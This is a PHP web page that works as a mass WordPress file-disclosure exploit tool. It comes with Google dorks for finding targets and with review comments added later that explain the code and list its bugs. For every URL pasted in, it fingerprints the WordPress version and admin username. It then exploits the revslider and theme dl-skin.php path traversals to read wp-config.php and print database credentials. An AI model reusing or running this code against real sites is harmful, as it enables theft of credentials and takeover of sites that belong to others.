[SCRIPT]=> Exploits Wordpress LFD

<html>
<body>
<!-- NOTE(review): the markup is unbalanced. A second <pre> is opened below (the "<pre><hre>" line,
     where <hre> is presumably a typo for <hr>) but only one </pre> is ever closed, and the closing
     tags at the end of the file are in the wrong order (</html> before </body>). Browsers tolerate
     it; left unchanged here because it does not affect the PHP. -->
<pre><center>                  


        <h2>Exploits Wordpress LFD </h2>
       
            <p>Coded by jsass , Twitter : @kwSecurity</p>

_______________________________________________________________

    <pre><hre>
    <!-- Operator input: one target base URL per line. The PHP below splits the
         textarea on "\r\n" only, so LF-only line endings become a single target. -->
    <form method='POST'>
    <textarea name='sites' cols='45' rows='15'></textarea>
    <input type='submit' value='Exploit' /><br>
    </form>


<?php

# Coded by : jsass
# Exploits Wordpress LFD
# Twitter : @KwSecurity
# Great's To Sec4ever.com &

/**
 Dork Google: revslider.php "index of"
 "wp-content/themes/construct/"
 "wp-content/themes/persuasion"
 "wp-content/themes/manbiz2"
 "wp-content/themes/elegance"
 "wp-content/themes/modular/"
 "wp-content/themes/myriad/"
 "wp-content/themes/echelon/"
 "wp-content/themes/fusion/"
 "wp-content/themes/awake/"
**/

# ---------------------------------------------------------------------------
# Review summary -- what this script does
#
# For every URL posted in the `sites` textarea it:
#   1. fetches the site root and, if a "WordPress <...> />" string is found in
#      the response (presumably the generator <meta> tag), prints that version
#      string plus the first '|'-separated part of the <title> of /?author=1,
#      which it treats as the username of user id 1;
#   2. requests wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
#      (revslider / Slider Revolution path traversal) and, if the body contains
#      DB_USER, prints the DB_NAME / DB_USER / DB_PASSWORD / DB_HOST values;
#   3. POSTs _mysite_download_skin=../../../../../wp-config.php to
#      lib/scripts/dl-skin.php under each theme directory in $lt and prints the
#      same fields from the first theme that answers with the config file.
#
# This is an attack tool aimed at third-party sites: run it only against
# systems you are explicitly authorised to test.
#
# Defects found in review, all marked NOTE(review) inline and left unchanged:
#   - $_POST['sites'] is read with no isset() guard;
#   - strings taken from the *target's* responses (title, version, credentials)
#     and the operator's own URL are echoed unescaped into HTML (XSS against
#     whoever runs the tool);
#   - the first and second curl handles have no CURLOPT_TIMEOUT;
#   - $site is overwritten inside the theme loop, so only the first theme path
#     is ever requested at the correct URL;
#   - the dl-skin.php curl handle is never closed;
#   - the separator echo after `break` is unreachable.
# ---------------------------------------------------------------------------

# Long target lists must not hit max_execution_time; the output-buffer calls make
# each site's result reach the browser as soon as it is echoed.
@set_time_limit(0);
ob_implicit_flush(true);
ob_end_flush();

# NOTE(review): no isset() check. A plain GET of this page raises an undefined
# index notice and the loop still runs once with an empty $site, probing
# relative URLs such as "/wp-admin/admin-ajax.php?...". Only CRLF is accepted
# as the separator.
$sites = explode("\r\n", $_POST['sites']);

foreach($sites as $site) {

$site = trim($site);

# --- 1. Fingerprint: GET the site root. CURLOPT_HEADER is on, so $get holds
# response headers followed by the body. $get is false if the request fails.
# NOTE(review): no CURLOPT_TIMEOUT on this handle -- one unresponsive target
# stalls the entire run.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site");
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
$get = curl_exec($ch);
curl_close($ch);
    # Lazy match from "WordPress " up to the first "/>" (presumably the
    # generator meta tag); the whole match ($version[0]) is used and the
    # trailing "/>" and any double quotes are stripped for display.
    if(preg_match("#WordPress (.*?)/>#", $get, $version)){
    $str = str_replace('/>', "", $version[0]);
    $str = str_replace('"', "", $str);
   
    # Author archive for user id 1. Its <title> is split on '|' and the first
    # piece is assumed to be the username -- this depends on the target theme's
    # title format and is not verified. Errors from file_get_contents are
    # suppressed; if no <title> is found, $user[1] is an undefined index.
    $users = @file_get_contents("$site/?author=1");
    preg_match('/<title>(.*?)<\/title>/si',$users,$user);
    $wpuser = explode('|',$user[1]);
echo " <br>-----------------------------------</br>";
# NOTE(review): $site, $wpuser[0] and $str are written raw into HTML. The
# username and version come from the target's own response, so a malicious or
# compromised target can inject markup/script into the operator's browser.
# Each value should go through htmlspecialchars() before being echoed.
echo "Site : ".$site."<br> Wp User : ".$wpuser[0]."<br> Version : ".$str."<br>"; }
   
    # Dork Google: revslider.php "index of"

# --- 2. revslider: admin-ajax.php revslider_show_image path traversal for
# wp-config.php. Body only (no CURLOPT_HEADER), redirects not followed.
# NOTE(review): no CURLOPT_TIMEOUT here either.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php");
curl_setopt($ch, CURLOPT_HTTPGET, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
$xp = curl_exec ($ch);
curl_close($ch);

# The patterns below only match single-quoted define() arguments, i.e.
# define('DB_NAME', '...'); a wp-config.php written with double quotes passes
# the DB_USER check but yields empty $DB_*[1] fields.
# NOTE(review): the extracted values, including DB_PASSWORD, are echoed
# unescaped into the page.
if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";

}

# --- 3. Theme dl-skin.php: POST _mysite_download_skin with a traversal path.
# Candidate theme directories; each gets one POST, stopping at the first hit.
# NOTE(review): "method" is probed here but is missing from the dork list in
# the header comment above.
$lt = array("wp-content/themes/construct/lib/scripts/dl-skin.php","wp-content/themes/persuasion/lib/scripts/dl-skin.php","wp-content/themes/manbiz2/lib/scripts/dl-skin.php","wp-content/themes/method/lib/scripts/dl-skin.php","wp-content/themes/elegance/lib/scripts/dl-skin.php","wp-content/themes/modular/lib/scripts/dl-skin.php","wp-content/themes/myriad/lib/scripts/dl-skin.php","wp-content/themes/echelon/lib/scripts/dl-skin.php","wp-content/themes/fusion/lib/scripts/dl-skin.php","wp-content/themes/awake/lib/scripts/dl-skin.php");
    foreach($lt as $l){
    # NOTE(review): this overwrites the base URL in place. From the second
    # iteration on, the request goes to <site>/<path1>/<path2>/..., so only the
    # first entry of $lt is ever requested at the right URL. The full URL
    # should be built into a separate variable.
    $site = "$site/$l";
$process = curl_init($site);
curl_setopt($process, CURLOPT_TIMEOUT, 30);
curl_setopt($process, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)");
# Headers are included in $return and redirects are followed -- unlike the
# two handles above.
curl_setopt($process, CURLOPT_HEADER, TRUE);
curl_setopt($process, CURLOPT_POST, 1);
curl_setopt($process, CURLOPT_POSTFIELDS, "_mysite_download_skin=../../../../../wp-config.php");
curl_setopt($process, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($process, CURLOPT_FOLLOWLOCATION, 1);
$return = curl_exec($process);
# NOTE(review): $process is never curl_close()d -- one handle leaks per probe.
# Same single-quote-only extraction and unescaped output as in step 2.
if(preg_match("#DB_USER#i",$return)){
preg_match("#'DB_NAME', '(.*?)'#i",$return,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$return,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$return,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$return,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
# Stop at the first theme that leaks the config.
break;
# NOTE(review): unreachable -- it follows the unconditional break above.
echo " <br>-----------------------------------</br>";

}
}
}

?>
</html>
</body>
</pre></center>